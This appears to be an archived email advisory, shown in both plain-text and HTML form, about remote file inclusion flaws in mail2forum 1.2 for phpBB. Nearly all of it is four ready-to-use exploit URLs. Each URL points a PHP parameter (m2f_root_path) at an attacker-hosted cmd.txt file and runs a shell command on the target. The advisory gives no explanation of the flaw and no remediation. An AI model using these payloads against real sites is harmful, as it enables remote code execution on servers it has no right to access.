mail2forum versions 1.2 and below suffer from remote file inclusion vulnerabilities.
5bb66ce5823c22baa2e4fd51d4bd92bef36bd24f8587658c318e8d33ed9ddf43------=_Part_28928_1151264.1153174544672
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
mail2forum <= 1.2 Multiple Remote File Include Vulnerabilities
Discovered By OLiBekaS
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : mail for phpbb (bulletin board/forum software)
version : latest version [ 1.2 ]
URL : http://www.www.mail2forum.com
Exploit :
http://[target]/[forum_path]/m2f/m2f_phpbb204.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls
http://[target]/[forum_path]/m2f/m2f_forum.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls
http://[target]/[forum_path]/m2f/m2f_mailinglist.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls
http://[target]/[forum_path]/m2f/m2f_cron.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls
------=_Part_28928_1151264.1153174544672
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
<div>mail2forum <= 1.2 Multiple Remote File Include Vulnerabilities</div>
<div> </div>
<div>Discovered By OLiBekaS</div>
<div> </div>
<div>
<p>Affected software description :<br>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~</p>
<p>Application : mail for phpbb (bulletin board/forum software)<br>version : latest version [ 1.2 ]<br>URL : <a href="http://www.www.mail2forum.com">http://www.www.mail2forum.com</a><br></p>
<p>Exploit : </p>
<p><a href="http://[target]/[forum_path]/m2f/m2f_phpbb204.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls">http://[target]/[forum_path]/m2f/m2f_phpbb204.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls</a>
<br><a href="http://[target]/[forum_path]/m2f/m2f_forum.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls">http://[target]/[forum_path]/m2f/m2f_forum.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls</a><br><a href="http://[target]/[forum_path]/m2f/m2f_mailinglist.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls">
http://[target]/[forum_path]/m2f/m2f_mailinglist.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls</a><br><a href="http://[target]/[forum_path]/m2f/m2f_cron.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls">http://[target]/[forum_path]/m2f/m2f_cron.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls
</a></p></div>
------=_Part_28928_1151264.1153174544672--
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed